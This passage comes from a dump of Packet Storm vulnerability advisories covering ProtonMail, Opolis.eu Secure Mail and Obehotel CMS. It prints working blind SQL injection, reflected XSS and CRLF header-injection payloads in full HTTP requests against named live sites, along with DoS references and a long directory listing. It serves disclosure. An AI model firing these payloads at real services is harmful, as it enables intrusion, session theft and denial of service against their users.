0 \n \nConnection: close \n \nContent-Type: text/html \n \n \n \nHow to fix this vulnerability \n----------------------------- \n \n \nYou need to restrict CR(0x13) and LF(0x10) from the user \n \ninput or properly encode the output in order to prevent \n \nthe injection of custom HTTP headers. \n \n \n \n \n \nVariant 1 \n----------- \n \n \nGET \n/crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_asapsec \nHTTP/1.1 \n \nReferer: https://protonmail.ch:443/ \n \nCookie: PHPSESSID=afaj9rt84m3oevgtld6thfe9l4; cryptcookietest=1 \n \nHost: protonmail.ch \n \nConnection: Keep-alive \n \n \nResponse \n---------- \n \n \nHTTP/1.0 302 Found \n \nDate: Wed, 28 May 2014 15:33:55 GMT \n \nServer: Apache/2.2.3 (CentOS) \n \nX-Powered-By: PHP/5.3.28 \n \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \n \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \n \nPragma: no-cache \n \nSet-Cookie: cryptcookietest=1 \n \nLocation: cryptographp.inc.php?cfg= \n \nSomeCustomInjectedHeader: injected_by_wvs&sn=PHPSESSID& \n \nStrict-Transport-Security: max-age=15768000;includeSubDomains \n \nContent-Length: 0 \n \nConnection: close \n \nContent-Type: text/html \n \n \n \n \n \n \nApache 2.x version older than 2.2.10 \n************************************** \n \n \nFixed in Apache httpd 2.2.10: mod_proxy_ftp globbing XSS CVE-2008-2939 \n \nA flaw was found in the handling of wildcards in the path of a FTP URL \nwith mod_proxy_ftp. \n \nIf mod_proxy_ftp is enabled to support FTP-over-HTTP, requests \ncontaining globbing characters could lead to cross-site scripting (XSS) \nattacks. \n \nAffected Apache versions (2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, \n2.2.2, 2.2.0). \n \n \n \n \nApache httpd remote denial of service \n************************************* \n \n \nVulnerability description \n------------------------------ \n \n \nA denial of service vulnerability has been found in the way the multiple \n \noverlapping ranges are handled by the Apache HTTPD server: \n \n \n \n \nhttp://seclists.org/fulldisclosure/2011/Aug/175 \n \n \n \nAn attack tool is circulating in the wild. Active use of this tools has \nbeen observed. The attack can be done remotely \n \nand with a modest number of requests can cause very significant memory \nand CPU usage on the server. \n \n \nAffected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through \n2.2.19). \n \n \n \nHow to fix this vulnerability \n----------------------------- \nUpgrade to the latest version of Apache HTTP Server (2.2.20 or later), \navailable from the Apache HTTP Server Project Web site. \n \n \n \n \n \nWeb references \n-------------- \nCVE-2011-3192 \n \n \n \n \n \n \n \n \nSensitive page could be cached \n****************************** \n \n \nVulnerability description \n----------------------- \n \n \nThis page contains possible sensitive information (e.g. a password \nparameter) \n \nand could be potentially cached. Even in secure SSL channels sensitive \ndata could \n \nbe stored by intermediary proxies and SSL terminators. To prevent this, \na Cache-Control header should be specified. \n \nThis vulnerability affects \n \n \n/sign_up.php (a18aae949b9855b60506dc83164afe7f). \n \n \nGET /sign_up.php?username=urvimsoj HTTP/1.1 \n \nPragma: no-cache \n \nReferer: https://protonmail.ch/lander/ \n \n \nResponse \n---------- \n \nHTTP/1.0 200 OK \n \nDate: Sun, 18 May 2014 19:27:10 GMT \n \nServer: Apache/2.2.3 (CentOS) \n \nX-Powered-By: PHP/5.3.28 \n \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \n \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \n \nPragma: no-cache \n \nStrict-Transport-Security: max-age=15768000;includeSubDomains \n \nConnection: close \n \nContent-Type: text/html \n \nContent-Length: 8285 \n \n \n \n \nHTML form without CSRF protection \n******************************** \n \n \nVulnerability description \n------------------------------ \n \n \nCross-site request forgery, also known as a one-click attack or session \nriding \nand abbreviated as CSRF or XSRF, is a type of malicious exploit of a \nwebsite \nwhereby unauthorized commands are transmitted from a user that the \nwebsite trusts. \n \nPenetration Tester (Authors) found a HTML form with no apparent CSRF \nprotection implemented. Consult details for more information about the \naffected HTML form. \n \n \nAffected items \n--------------- \n \n/blog \n/blog/transparency-report \n/blog/wp-login.php \n/blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e) \n/crypt \n/lander \n/login.php \n/report_bug.php \n/sign_up.php \n \n \n \nThe impact of this vulnerability \n-------------------------------- \n \n \nAn attacker may force the users of a web application to execute actions \nof the attacker's choosing. \n \nA successful CSRF exploit can compromise end user data and operation in \ncase of normal user. \n \nIf the targeted end user is the administrator account, this can \ncompromise the entire web application. \n \n \n \n \nHow to fix this vulnerability \n----------------------------- \n \n \nCheck if this form requires CSRF protection and implement CSRF \ncountermeasures if necessary. \n \n \n \nCREDITS \n------------------------- \n \nThis vulnerability has been discovered \n \nby Juan Carlos Garc\u00eda(@secnight) \n \nand \n \nFrancisco Moraga (@btshell) \n \n \n \n \nVII. LEGAL NOTICES \n------------------------- \n \nThe Authors accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126851/protonmail-csrfheader.txt"}, {"lastseen": "2016-12-05T22:11:40", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-07T00:00:00", "published": "2013-10-07T00:00:00", "href": "https://packetstormsecurity.com/files/123527/Opolis.eu-Secure-Mail-Blind-SQL-Injection-XSS-CSRF-DoS.html", "id": "PACKETSTORM:123527", "type": "packetstorm", "title": "Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS", "sourceData": "`========================================================================================================================================================================= \nOPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text \n========================================================================================================================================================================== \n \nTIME-LINE VULNERABILITY \n \nMultiples Advisories \n \nOpolis Secure IT-Services GmbH \n \nAddress:Romberggasse 3 \n1230 Vienna \nAustria \nE-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu> \n \nBUT \n \nNot Response \n \nTHEN \n \nFull Disclosure \n \n \nI. VULNERABILITY \n------------------------- \n#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text \n \n#Vendor:http://www.opolis.eu/ \n \n#Author:Juan Carlos Garc\u00eda (@secnight) \n \n#Follow me \nTwitter:@secnight \n \nII. DESCRIPTION \n------------------------- \nOpolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service. \nOpolis re-defines E-Mail with its \u201cPower to the Sender\u201d philosophy: The sender decides if or how E-Mails may be further \nprocessed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions \nfor internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL. \n \nIII. PROOF OF CONCEPT \n------------------------- \n \nBlind SQL Injection \n******************** \n \nVulnerability description \n------------------------- \n \nSQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and \n \ndoesn't properly filter out dangerous characters. \n \nThis is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. \n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \n \nURL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect \n \n%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc \n \n \n \n/slimstat/stats_js.php \n \n\"ttl\" \n \nURL encoded GET input \"ttl\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \n \n\"url\" \n \nURL encoded GET input \"url\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nCross site scripting ( 67 ) \n********************* \n \nCross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious \ncode (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be \ntrusted or not, it will execute the script in the user context allowing the attacker to access any cookies \nor session tokens retained by the browser. \n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2) \n \nURL encoded POST input OSMLogInNam was set to hkmohkhr_974672\"():;934304 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n \ncheckloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304 \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2) \n \nURL encoded POST input currentEmail was set to sample%40email.tst_940309\"():;974560 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncurrentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl \n \n \n \n/OpolisSignUp/OpolisSignUpStep1a.php (2) \n \nURL encoded POST input OSMLogInNam was set to etomstqd_911786\"():;974637 \n \nPOST /OpolisSignUp/OpolisSignUpStep1a.php \n \ncheckloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637 \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php \n \nURL encoded POST input currentEmail was set to sample%40email.tst_928249\"():;986211 \n \nThe input is reflected inside <script> tag between double quotes. \n \n \n \nPOST /OpolisSignUp/OpolisSignUpStep2a.php \n \n \ncurrentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(939864) bad=\" \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield= \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5) \n \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(911118) bad=\" \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n \ncheckedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield \n \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(967963) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52) \n \nURL encoded POST input aicountry was set to Antarctica'\"()&%<ScRiPt >prompt(973546)</ScRiPt> \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt \n \n%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(994853) bad=\" \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield= \n \n \n/OpolisSignUp/OpolisSignUpStep3a.php. (5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(935016) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield= \n \n \nCross Site Request Forgery CSRF (12) \n******************************* \n \nCross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, \nis a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. \n \n \nAffected items \n--------------- \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) \n/OpolisSignUp/OpolisSignUpStep1a.php \n/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) \n/OpolisSignUp/OpolisSignUpStep3a.php \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n--------------------------------- \n \nAn attacker may force the users of a web application to execute actions of the attacker's choosing. \nA successful CSRF exploit can compromise end user data and operation in case of normal user. \nIf the targeted end user is the administrator account, this can compromise the entire web application. \n \n \nTwo examples ( too much security flaws .. ) \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2) \n \nAttack details \n---------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \nForm method: POST \n \nForm inputs: \n \ncheckloginname [Hidden] \nOSMLogInNam [Text] \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). \n \nAttack details \n----------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php \nForm method: POST \n \nForm inputs: \n \nshowcheckedloginname [Text] \ncurrentEmail [Text] \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=&showEmailfield= \n \n \n \nApache httpd Remote D.O.S (2) \n************************** \n \nVulnerability description \n------------------------------- \nA denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: \n \nhttp://seclists.org/fulldisclosure/2011/Aug/175 \n \nAn attack tool is circulating in the wild. Active use of this tools has been observed. \n \nThe attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. \n \n \nAffected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). \n \n \nHow to fix this vulnerability \n---------------------------- \nUpgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. \n \nWeb references \n-------------- \nCVE-2011-3192 \nApache HTTPD Security ADVISORY \nApache HTTP Server 2.2.20 Released \nApache httpd Remote Denial of Service (memory exhaustion) \n \n \nApache httpOnly cookie disclosure \n********************************** \n \nVulnerability description \n---------------------------- \nApache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors \n \ninvolving a (1) long or (2) malformed header in conjunction with crafted web script. \n \nAffected Apache versions (up to 2.0.21). \n \nThe impact of this vulnerability \n------------------------------- \nInformation disclosure. \n \nHow to fix this vulnerability \n------------------------------ \nUpgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue. \n \nWeb references \n--------------- \nFixed in Apache httpd 2.2.22 \nApache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability \n \n \n \nPHP hangs on parsing particular strings as floating point number (2) \n***************************************************************** \n \nPHP hangs when parsing '2.2250738585072011e-308' string as a floating point number. \n \nCurrent version is : PHP/5.3.1 \n \nAffected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17 \n \nAffected items \n--------------- \nWeb Server \n \nThe impact of this vulnerability \n---------------------------------- \nDenial of service attack \n \nHow to fix this vulnerability \n------------------------------- \nUpgrade PHP to the latest version. \n \nWeb references \n----------------- \nPHP Hangs On Numeric Value 2.2250738585072011e-308 \nPHP Homepage \n \n \nUser credentials are sent in clear text \n***************************************** \n \nVulnerability description \n--------------------------- \nUser credentials are transmitted over an unencrypted channel. \nThis information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. \n \nAffected items \n-------------- \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n---------------------------------- \nA third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. \n \nHow to fix this vulnerability \n------------------------------- \nBecause user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). \n \n \nIV. BUSINESS IMPACT \n------------------------- \n \n( No Comments... ) \n \nV SOLUTION \n------------------------ \n \nVery easy and I don\u00b4t understand... WRITE SECURE CODE P L E A S E !! \n \n \nVI. CREDITS \n------------------------- \n \nThis vulnerability has been discovered \nby Juan Carlos Garc\u00eda(@secnight) \n \n \nVII. LEGAL NOTICES \n------------------------- \n \nThe Author accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123527/opolisdoteu-sqlxssxsrfdos.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:11", "bulletinFamily": "exploit", "description": "", "modified": "2013-08-26T00:00:00", "published": "2013-08-26T00:00:00", "href": "https://packetstormsecurity.com/files/122962/Obehotel-CMS-Denial-Of-Service-SQL-Injection.html", "id": "PACKETSTORM:122962", "type": "packetstorm", "title": "Obehotel CMS Denial Of Service / SQL Injection", "sourceData": "` \nOBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post \n \nI-VULNERABILITY \n------------------------- \n \n#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post \n \n#Vendor:https://secureadv.obehotel.com/mpa/ \n \n#Author:Juan Carlos Garc\u00eda (@secnight) \n \n#Follow me \n \nhttp://www.highsec.es \nhttp://hackingmadrid.blogspot.com \nTwitter:@secnight \n \n \n \nII-Introduction: \n================ \n \nObehotel is the set of different solutions, technological developments and applications directed \nto hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience. \n \nObehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector \nEfimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner. \n \nThis union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry. \n \n------------------------- \n \nIII-PROOF OF CONCEPT \n==================== \n \n \nAttack details \n-------------- \n \nBlind SqlInjection \n****************** \n \nSQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. \n \nAn SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't \nproperly filter out dangerous characters. \n \nAn attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. \n \nDepending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. \n \nIt may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, \nit may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. \n \nCertain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). \n \nIf an attacker can obtain access to these procedures it may be possible to compromise the entire machine. \n \n \n \nAttack details \n-------------- \n \nURL encoded POST input username was set to \n \nxlgskuot' or (sleep(2)+1) limit 1 -- \n \nPOST /mpa/index.php \n \n \nServer: Apache/2.2.16 (Debian) \nX-Powered-By: PHP/5.3.3-7+squeeze14 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nLocation: ./hotel_inicio/index.php \nVary: Accept-Encoding \nContent-Length: 3402 \nKeep-Alive: timeout=15, max=92 \nConnection: Keep-Alive \nContent-Type: text/html; charset=utf-8 \n \n \npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20 \n \nvariant (1) \n \nname \n \nPOST /mpa/index.php HTTP/1.1 \nContent-Length: 92 \nContent-Type: application/x-www-form-urlencoded \nCookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3 \nHost: secureadv.obehotel.com \nConnection: Keep-alive \nAccept-Encoding: gzip,deflate \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) \nAccept: */* \n \npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20 \n \n \n \nApache httpd Remote Denial of Service \n************************************* \n \n \nA denial of service vulnerability has been found in the way the multiple overlapping ranges \nare handled by the Apache HTTPD server: \n \nhttp://seclists.org/fulldisclosure/2011/Aug/175 \n \nCVE-2011-3192 \n \nAn attack tool is circulating in the wild. Active use of this tools has been observed. \n \nThe attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. \n \n \nAffected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). \n \nCurrent version is : 2.2.16 \n \n \nDirectory Listing \n***************** \n \nThe web server is configured to display the list of files contained in this directory. \nThis is not recommended because the directory may contain files that are not normally \nexposed through links on the web site.A user can view a list of all files from this \ndirectory possibly exposing sensitive information. \n \nAffected items 226 \n \nAffected items \n/mpa/core \n/mpa/core/ajax \n/mpa/core/ajax/blog \n/mpa/core/ajax/newsfeed \n/mpa/core/class \n/mpa/core/css \n/mpa/core/css/plugins \n/mpa/core/fonts \n/mpa/core/images \n/mpa/core/images/assets \n/mpa/core/images/assets/thumb \n/mpa/core/images/assets/thumb/large \n/mpa/core/images/assets/thumb/medium \n/mpa/core/images/assets/thumb/small \n/mpa/core/images/blueline \n/mpa/core/images/colorbox \n/mpa/core/images/colorpicker \n/mpa/core/images/contrast \n/mpa/core/images/default \n/mpa/core/images/greenline \n/mpa/core/images/headerbg \n/mpa/core/images/icons \n/mpa/core/images/icons/64 \n/mpa/core/images/icons/blogperfume \n/mpa/core/images/icons/blogperfume/Advertisment \n/mpa/core/images/icons/blogperfume/Archive \n/mpa/core/images/icons/blogperfume/Article \n/mpa/core/images/icons/blogperfume/Author \n/mpa/core/images/icons/blogperfume/Blog%20Roll \n/mpa/core/images/icons/blogperfume/Comments \n/mpa/core/images/icons/blogperfume/Date \n/mpa/core/images/icons/blogperfume/Email \n/mpa/core/images/icons/blogperfume/Plugins \n/mpa/core/images/icons/blogperfume/RSS \n/mpa/core/images/icons/blogperfume/Themes \n/mpa/core/images/icons/blogperfume/Views \n/mpa/core/images/icons_actions \n/mpa/core/images/kozers \n/mpa/core/images/kozers/original \n/mpa/core/images/kozers/thumb \n/mpa/core/images/loaders \n/mpa/core/images/markers \n/mpa/core/images/preview \n/mpa/core/images/thumbs \n/mpa/core/images/uniform \n/mpa/core/js \n/mpa/core/js/custom \n/mpa/core/js/lang \n/mpa/core/js/plugins \n/mpa/core/js/plugins/ckfinder \n/mpa/core/js/plugins/ckfinder/_samples/php \n/mpa/core/js/plugins/ckfinder/core \n/mpa/core/js/plugins/ckfinder/core/connector \n/mpa/core/js/plugins/ckfinder/core/connector/php \n/mpa/core/js/plugins/ckfinder/core/connector/php/lang \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5 \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Utils \n/mpa/core/js/plugins/ckfinder/help \n/mpa/core/js/plugins/ckfinder/help/cs/files \n/mpa/core/js/plugins/ckfinder/help/en/files \n/mpa/core/js/plugins/ckfinder/help/es/files \n/mpa/core/js/plugins/ckfinder/help/es/files/images \n/mpa/core/js/plugins/ckfinder/help/es-mx/files \n/mpa/core/js/plugins/ckfinder/help/es-mx/files/images \n/mpa/core/js/plugins/ckfinder/help/fi/files \n/mpa/core/js/plugins/ckfinder/help/fi/files/images \n/mpa/core/js/plugins/ckfinder/help/files \n/mpa/core/js/plugins/ckfinder/help/files/images \n/mpa/core/js/plugins/ckfinder/help/files/other \n/mpa/core/js/plugins/ckfinder/help/lt/files \n/mpa/core/js/plugins/ckfinder/help/lt/files/images \n/mpa/core/js/plugins/ckfinder/help/pl/files \n/mpa/core/js/plugins/ckfinder/lang \n/mpa/core/js/plugins/ckfinder/plugins \n/mpa/core/js/plugins/ckfinder/plugins/dummy \n/mpa/core/js/plugins/ckfinder/plugins/dummy/lang \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/lib \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/clike \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/css \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/htmlmixed \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/javascript \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/php \n/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/xml \n/mpa/core/js/plugins/ckfinder/plugins/flashupload \n/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash \n/mpa/core/js/plugins/ckfinder/plugins/gallery \n/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox \n/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images \n/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images/ie6 \n/mpa/core/js/plugins/ckfinder/plugins/imageresize \n/mpa/core/js/plugins/ckfinder/plugins/imageresize/images 